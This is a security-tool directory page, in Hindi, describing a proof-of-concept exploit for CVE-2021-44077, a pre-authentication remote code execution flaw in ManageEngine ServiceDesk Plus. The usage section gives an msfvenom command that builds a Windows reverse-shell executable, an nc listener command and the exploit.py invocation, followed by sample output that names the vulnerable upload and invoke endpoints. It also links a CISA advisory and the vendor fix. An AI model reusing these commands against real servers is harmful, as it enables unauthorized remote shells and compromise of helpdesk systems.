Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44077 — ManageEngine ServiceDesk Plus (CVE-2021-44077) में PreAuth RCE के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। कमजोर लक्ष्यों पर मनमाने Windows एक्जीक्यूटेबल्स को अपलोड और निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2021-44077
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhorizon3ai/cve-2021-44077

CVE-2021-44077

ManageEngine ServiceDesk Plus (CVE-2021-44077) में PreAuth RCE के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। कमजोर लक्ष्यों पर मनमाने Windows एक्जीक्यूटेबल्स को अपलोड और निष्पादित करता है।

रिपॉजिटरी देखें
36924 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44077

CVE-2021-44077 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट: ManageEngine ServiceDesk Plus < 11306 में PreAuth RCE

आधारित:

  • https://xz.aliyun.com/t/10631

CISA सलाह:

  • https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

समाधान (बिल्ड 11306 या बाद में अपडेट करें):

  • https://www.manageengine.com/products/service-desk/security-response-plan.html

ManageEngine ServiceDesk Plus बिल्ड 11303 पर परीक्षण किया गया। सभी एंटीवायरस अक्षम किए गए।

उपयोग

एक्सप्लॉइट लक्ष्य पर एक Windows निष्पादन योग्य अपलोड करता है और उसे चलाता है।

एक्सप्लॉइट करने के लिए, पहले कोई निष्पादन योग्य जनरेट करें। उदाहरण के लिए:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe

pip install आवश्यकताएँ फ़ाइल या सुनिश्चित करें कि आपके पास requests पैकेज है।

यदि आप रिवर्स शेल पकड़ने का प्रयास कर रहे हैं, तो पहले अपना लिसनर चलाएँ, उदाहरण के लिए:

root@kitploit:~
nc -l 4444

फिर एक्सप्लॉइट स्क्रिप्ट चलाएँ, जिसमें url और exe तर्क दें, उदाहरण के लिए:

root@kitploit:~
python exploit.py http://<TARGET>:<PORT> <path_to_exe>

स्क्रिप्ट आउटपुट का उदाहरण:

root@kitploit:~
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

Proof

एक्सप्लॉइट नोट्स

  • यह भेद्यता आपको इंस्टॉल bin निर्देशिका में कोई भी फ़ाइल अपलोड करने की अनुमति देती है, जिसमें बैच स्क्रिप्ट जैसी मौजूदा फ़ाइलें शामिल हैं। अपलोड की गई फ़ाइल को आमंत्रित करने के अन्य तरीके भी हो सकते हैं।
  • वेब शेल को सीधे अपलोड करना एक फ़िल्टर द्वारा रोका जाता प्रतीत होता है।

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें